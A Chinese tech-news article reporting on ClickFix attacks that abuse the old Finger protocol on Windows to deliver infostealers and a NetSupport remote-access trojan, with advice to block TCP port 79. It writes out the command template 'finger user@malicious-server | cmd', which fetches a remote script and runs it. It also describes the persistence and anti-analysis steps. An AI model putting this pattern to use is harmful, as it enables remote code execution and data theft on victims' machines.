游乐游手机版
首页/科技数码/文章详情

黑客滥用古董Windows命令,40年后仍可远程毒控你的电脑

时间:2025-11-17 11:23
11 月 16 日消息,科技媒体 bleepingcomputer 昨日(11 月 15 日)发布博文,报道称近期有黑客滥用诞生约 40 年的“Finger”协议,成为新型 ClickFix 恶意

11月16日消息,科技媒体bleepingcomputer昨日(11月15日)发布报告指出,近期有黑客组织利用诞生约40年的“Finger”协议,将其作为新型ClickFix恶意软件攻击链条中的关键环节。

注:Finger协议是一种非常早期的互联网协议,诞生于上世纪70年代,主要功能是让用户查询其他用户的公开信息(如登录名、最后上线时间等)。在现代网络环境中已被基本废弃,但其客户端程序(finger.exe)仍在部分操作系统(如Windows)中保留。

攻击者利用该协议,在新型的ClickFix恶意软件攻击中,向受感染的Windows设备远程下发并执行恶意指令。Finger协议最初用于在Unix/Linux系统上查询用户信息,后来也被集成到Windows系统中。

虽然如今已鲜少有人使用,但其作为系统原生工具的特性,使其成为一种理想的“原生二进制程序(LOLBIN)”,能有效规避部分安全软件的检测机制。

攻击的核心在于社会工程学欺骗。攻击者会通过各种方式(如网页弹窗)显示一个伪造的“人机验证”提示,诱导用户按下Win+R快捷键并输入一行看似无害的命令。

约40年前的Windows古董命令被滥用,黑客远程投毒可掌控你的PC

该命令格式通常为 finger [用户名]@[恶意服务器地址] | cmd。一旦用户执行,Windows系统内置的finger.exe程序便会向指定服务器发起请求,而服务器返回的并非用户信息,而是一段预设的恶意脚本。

通过管道符 |,该脚本的输出被直接传递给Windows命令处理器cmd.exe执行,从而完成恶意代码的远程投递。

约40年前的Windows古董命令被滥用,黑客远程投毒可掌控你的PC

恶意脚本执行后,会立即展开一系列后续动作。它首先会创建一个随机命名的路径,并下载一个伪装成PDF文件的ZIP压缩包。解压后,其中的恶意载荷便会被激活。

约40年前的Windows古董命令被滥用,黑客远程投毒可掌控你的PC

根据分析,这些载荷主要分为两类:一类是专门用于窃取用户密码、浏览器记录等敏感数据的信息窃取程序(Infostealer);另一类则是功能更强大的NetSupport Manager远程访问木马(RAT),一旦植入,攻击者便能完全控制受害者的计算机。

为实现持久化,该脚本还会创建一个计划任务,确保恶意软件在用户每次登录系统时都能自动运行。

约40年前的Windows古董命令被滥用,黑客远程投毒可掌控你的PC

研究人员发现,这种攻击手法还在不断演变。在一些更新的攻击案例中,恶意脚本在执行核心任务前,会先扫描受害者电脑中是否存在常见的恶意软件分析工具。

约40年前的Windows古董命令被滥用,黑客远程投毒可掌控你的PC

这些工具包括Process Monitor、Wireshark、Fiddler、OllyDbg等数十款。如果检测到任何一款分析工具正在运行,脚本会立即终止执行,从而增加安全研究人员对其进行分析和追踪的难度。

由于此类攻击依赖于Finger协议进行通信,而该协议使用专门的TCP 79端口,因此防御策略也相对明确。对于绝大多数企业和个人用户而言,Finger协议并无实际用途。因此,系统管理员和安全防护人员应在网络防火墙上阻止所有出站到TCP 79端口的流量。

来源:https://www.ithome.com/0/897/757.htm
上一篇深开鸿与电子科大合作:开源鸿蒙推动国产操作系统底层技术突破 下一篇广汽高阶飞车获2亿元Pre-A轮融资,今年已累计融资5亿元
本站内容用于信息整理与展示,如有侵权或内容问题请及时联系处理。

相关推荐

补充同频道和同主题内容,方便继续浏览更多相关内容。

同类最新

继续查看同栏目最近更新的文章。

更多
优必选CEO周剑:家庭机器人生态核心投入过半精力
科技数码 · 2026-07-01

优必选CEO周剑:家庭机器人生态核心投入过半精力

先说几个核心判断:优必选正在布局一盘长远战略。创始人兼CEO周剑在近期一场媒体沟通会上,直接亮出了公司未来的发展路线——工业、商用、家庭陪伴机器人三条业务主赛道并行推进,现阶段每条线各占约一半精力。一边是已经能够稳定创造收入的工业场景,另一边则是他眼中“最具想象力与未来空间”的家庭陪伴领域。工业人形

CPO/NPO/OIO开启封装级光连接价值空间,技术路线尚未收敛
科技数码 · 2026-07-01

CPO/NPO/OIO开启封装级光连接价值空间,技术路线尚未收敛

6月30日,申银万国在光连接系列研报中重点指出,MPO光连接器领域的投资机会值得高度关注。通俗来说,随着AI算力集群持续扩张,光互联升级带来的连锁效应——数据中心光纤通道数量、前面板端口密度、机柜内光纤管理复杂度——均在同步攀升。光连接器的角色早已超越传统的低价值标准件,如今它直接决定着链路插损、可

龙岗AR实景剧本游内测体验短板有效破解之道
科技数码 · 2026-07-01

龙岗AR实景剧本游内测体验短板有效破解之道

在今年龙岗区第二届人工智能与机器人发展大会上,区级部门一次性推出了7个AI“龙搭子”。其中,名为“龙导游”的成果成为文商旅融合领域的核心亮点。据南都N视频记者了解,依托“龙导游”打造的全区全域AR实景剧本游“龙岗大陆”,已在今年五一假期发布了内测版本。经过一个月市场验证后,该项目正式启动面向全社会的

南下资金6月30日净买入中芯国际与建滔积层板
科技数码 · 2026-07-01

南下资金6月30日净买入中芯国际与建滔积层板

6月30日,南下资金持续大举买入港股,单日净流入金额高达58 95亿港元。接下来,我们直接盘点哪些个股获得资金青睐、哪些遭到减持: 净买入方面,中芯国际领跑全场,单日吸金19 33亿港元;建滔积层板紧随其后,净买入10 59亿港元;腾讯控股获得7 65亿港元净流入;智谱(02513 HK)也有6 5

电动汽车电池新国标7月实施热失控不起火不爆炸
科技数码 · 2026-07-01

电动汽车电池新国标7月实施热失控不起火不爆炸

自2026年7月1日起,两项关乎电动汽车安全的核心强制性国家标准将正式实施,为行业加装“安全锁”——《电动汽车安全要求》(GB 18384-2025)与《电动汽车用动力蓄电池安全要求》(GB 38031-2025)同步落地。此次标准升级,从整车架构与电池系统两大维度,精准填补了近年来多起事故暴露出的